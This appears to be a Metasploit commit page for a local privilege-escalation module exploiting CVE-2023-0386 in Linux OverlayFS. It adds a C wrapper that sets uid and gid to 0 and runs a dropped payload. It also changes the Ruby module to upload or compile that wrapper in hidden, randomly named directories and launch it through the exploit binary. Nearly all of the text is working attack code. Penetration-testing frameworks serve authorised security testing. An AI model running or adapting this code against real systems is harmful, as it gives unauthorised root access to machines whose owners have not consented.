Call payload directory

rapid7 · Sep 7, 2024 · 692531b · 692531b
1 parent 2b63f8b
commit 692531b
Show file tree

Hide file tree

Showing 3 changed files with 30 additions and 4 deletions.
diff --git a/data/exploits/CVE-2023-0386/payload_wrapper.x64.elf b/data/exploits/CVE-2023-0386/payload_wrapper.x64.elf
diff --git a/external/source/exploits/CVE-2023-0386/payload_wrapper.c b/external/source/exploits/CVE-2023-0386/payload_wrapper.c
@@ -0,0 +1,24 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+int main(int argc, char const *argv[]) {
+    char cwd[500];
+    if (getcwd(cwd, sizeof(cwd)) == NULL) {
+        perror("getcwd() error");
+        return 1;
+    }
+    if (setuid(0) < 0) {
+        perror("setuid");
+        return -1;
+    }
+
+    if (setgid(0) < 0) {
+        perror("setgid");
+        return -1;
+    }
+    system(strcat(cwd, "/payload"));
+    return 0;
+}
diff --git a/modules/exploits/linux/local/cve_2023_0386_overlayfs_priv_esc.rb b/modules/exploits/linux/local/cve_2023_0386_overlayfs_priv_esc.rb
@@ -112,27 +112,28 @@ def exploit
     # Upload exploit executable
     exploit_dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
     exploit_path = "#{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"
+    payload_wrapper_path = "#{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"
 
     mkdir(exploit_dir)
     register_dir_for_cleanup(exploit_dir)
 
     if live_compile?
       vprint_status('Live compiling exploit on system...')
       upload_and_compile(exploit_path, strip_comments(exploit_source('CVE-2023-0386', 'cve_2023_0386.c')), '-D_FILE_OFFSET_BITS=64 -lfuse -ldl -pthread')
+      upload_and_compile(payload_wrapper_path, strip_comments(exploit_source('CVE-2023-0386', 'payload_wrapper.c')))
     else
       vprint_status('Dropping pre-compiled exploit on system...')
       upload_and_chmodx(exploit_path, exploit_data('CVE-2023-0386', 'cve_2023_0386.x64.elf'))
+      upload_and_chmodx(payload_wrapper_path, exploit_data('CVE-2023-0386', 'payload_wrapper.x64.elf'))
     end
 
     # Upload payload executable
-    payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
+    payload_path = "#{exploit_dir}/payload"
     upload_and_chmodx(payload_path, generate_payload_exe)
-    # register payload for automatic cleanup
-    register_file_for_cleanup(payload_path)
 
     # Launch exploit
     print_status('Launching exploit...')
-    cmd_string = "#{exploit_path} #{payload_path} #{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"
+    cmd_string = "#{exploit_path} #{payload_wrapper_path} #{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"
     vprint_status("Running: #{cmd_string}")
     begin
       output = cmd_exec(cmd_string, nil, datastore['TIMEOUT'])
@@ -145,4 +146,5 @@ def exploit
       cmd_exec("rm -rf '#{exploit_dir}'")
     end
   end
+
 end